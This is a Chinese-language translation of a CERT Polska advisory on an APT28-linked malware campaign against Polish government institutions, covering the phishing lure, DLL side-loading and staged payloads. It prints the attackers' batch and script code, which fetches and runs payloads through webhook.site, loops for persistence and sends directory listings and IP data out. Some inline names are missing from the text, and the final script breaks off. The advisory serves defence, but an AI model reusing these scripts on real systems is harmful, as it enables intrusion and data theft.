本周,CERT Polska (CSIRT NASK) 和 CSIRT MON 观察到针对波兰政府机构的大规模恶意软件活动。根据技术指标和与过去描述的攻击(m.in 针对乌克兰实体)的相似性,可以将该活动与与俄罗斯联邦武装部队总参谋部 (GRU) 主要情报局相关的 APT28 系列活动联系起来。
技术分析
在活动中,发送了电子邮件,其中包含内容,以引起收件人的兴趣并说服他们点击链接。所用消息的示例如下所示:
该链接指向 .它是开发人员用来创建和测试 API 的免费服务。在本例中,它仅用于重定向到另一个服务 – ,它允许您将所有查询记录到生成的地址并配置对它们的响应。这项服务在与 IT 相关的人中也很受欢迎。使用免费的常用服务,而不是您自己的域,可以显着减少对恶意链接的检测,同时降低操作成本。这是我们在许多 APT 组中观察到的趋势。最终从该站点下载了一个ZIP存档,其名称以照片的形式暗示了内容。它以 开头,以随机数结尾 - 例如 . .单击存档后,使用默认的 Windows 设置(隐藏扩展名且未显示隐藏文件),受害者会看到以下视图:
事实上,存档包含三个文件:
- 重命名的 Windows 计算器,例如,它假装是一张照片并鼓励受害者点击,
IMG-238279780.jpg.exe - 脚本(隐藏文件),
.bat - 假库(隐藏文件)。
WindowsCodecs.dll
如果受害者运行一个文件(这是一个无害的计算器),它将尝试加载在启动过程中被攻击者替换的库。这是一种称为 DLL 旁加载的技术。DLL 的唯一作用是运行包含的 BAT 脚本:IMG-238279780.jpg.exeWindowsCodecs.dll
@echo off
if not DEFINED IS_MINIMIZED (
set IS_MINIMIZED=1
start "" /min "%~dpnx0" %*
exit
)
start msedge data:text/html;base64,PHRpdGxlPklNRy02MzQ5MjMzNjk2OC5qcGc8L3RpdGxlPjxpZnJhbWUgc3JjPSJodHRwczovL3dlYmhvb2suc2l0ZS9hYWU0MmFlNC1mM2VhLTRkYmYtYTMzZi0zZmY1YjFiYWVjOWIiIHN0eWxlPSJwb3NpdGlvbjpmaXhlZDsgdG9wOjA7IGxlZnQ6MDsgYm90dG9tOjA7IHJpZ2h0OjA7IHdpZHRoOjEwMCU7IGhlaWdodDoxMDAlOyBib3JkZXI6bm9uZTsgbWFyZ2luOjA7IHBhZGRpbmc6MDsgb3ZlcmZsb3c6aGlkZGVuOyB6LWluZGV4Ojk5OTk5OTsiPjwvaWZyYW1lPg==
timeout 15 > nul
move %userprofile%\downloads\IMG-63492336968.jpg %programdata%\IMG-63492336968.cmd > nul
type nul > %userprofile%\downloads\IMG-63492336968.jpg
call %programdata%\IMG-63492336968.cmd
del /q /f /a %0
exit
BAT 脚本将打开 Microsoft Edge 浏览器,其中加载 base64 编码的页面内容以下载另一个批处理脚本(也使用 )。同时,浏览器会显示一个穿着泳装的真实女人的照片,以及她在社交媒体平台上的真实账户的链接。这是为了让攻击者的叙述更加可信,并安抚观众的警惕。该脚本将下载的扩展名为 .jpg 的文件保存到磁盘,将扩展名从 .jpg 更改为 .cmd,最后执行它。webhook.site
@echo off & (
echo On Error Resume Next
echo CreateObject("WScript.shell").Run "^""%%programdata%%\\dee016bf-21a2-45dd-86b4-6099747794c4.bat^"^^"", 0, False
echo Set oFso = CreateObject("Scripting.FileSystemObject") : oFso.DeleteFile Wscript.ScriptFullName, True
) > "%programdata%\dee016bf-21a2-45dd-86b4-6099747794c4.vbs" & echo del %%0 ^& for /l %%%%n in () do (
chcp 65001 ^& timeout 300 ^& taskkill /im msedge.exe /f ^& timeout 5 ^& del /q /f "%%userprofile%%\Downloads\*.css" ^& start "" msedge --headless=new --disable-gpu data:text/html;base64,PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgiaHR0cHM6Ly93ZWJob29rLnNpdGUvZGVlMDE2YmYtMjFhMi00NWRkLTg2YjQtNjA5OTc0Nzc5NGM0Iik7PC9zY3JpcHQ+ ^& timeout 30 ^& taskkill /im msedge.exe /f ^& move /y "%%userprofile%%\Downloads\*.css" "%%programdata%%\dee016bf-21a2-45dd-86b4-6099747794c4.cmd" ^& call "%%programdata%%\dee016bf-21a2-45dd-86b4-6099747794c4.cmd" ^& del /q /f "%%programdata%%\dee016bf-21a2-45dd-86b4-6099747794c4.cmd"
) > "%programdata%\dee016bf-21a2-45dd-86b4-6099747794c4.bat" & (
echo ^^^^var xhr = new XMLHttpRequest^(^);var text = String.raw^`)
) > "%programdata%\uaxhexd.tab" & (
echo ^`;xhr.open^(^'PUT^', ^'https://webhook.site/dee016bf-21a2-45dd-86b4-6099747794c4^'^);xhr.setRequestHeader^(^'Content-Type^', ^'text/html^'^);xhr.send^(text^);^^^
) > "%programdata%\ohqddqtqc.tsv" & start "" "%programdata%\dee016bf-21a2-45dd-86b4-6099747794c4.vbs" & del %0
此脚本是程序的主循环 - 在循环中,它首先等待 5 分钟,然后像以前一样,使用 Microsoft Edge 浏览器和 引用 ,它下载另一个脚本并执行它。这一次,下载扩展名的文件,然后将其扩展名更改为并运行。for /l %n in ()webhook.site.css.cmd。我们最终收到的脚本仅收集有关启动它们的计算机的信息(IP 地址和选定文件夹中的文件列表),然后将其发送到 C2 服务器,但攻击者选择的受害者计算机很可能收到一组不同的结束脚本。
@echo off
chcp 65001
taskkill /im msedge.exe /f
(dir "%userprofile%\.." & dir "%userprofile%\Desktop" & dir "%userprofile%\Downloads" & dir "%userprofile%\Documents" & dir "%ProgramFiles%" & dir "%ProgramFiles(x86)%" & curl -k https://ipinfo.io) > "%programdata%\bwjxyeysed.diff"
copy "%programdata%\*.tab" + "%programdata%\*.diff" + "%programdata%\*.tsv" "%programdata%\nydgflyhuv.html"
(echo %programdata%) > "%programdata%\gjvrexfiac"
set /p gjvrexfiac=
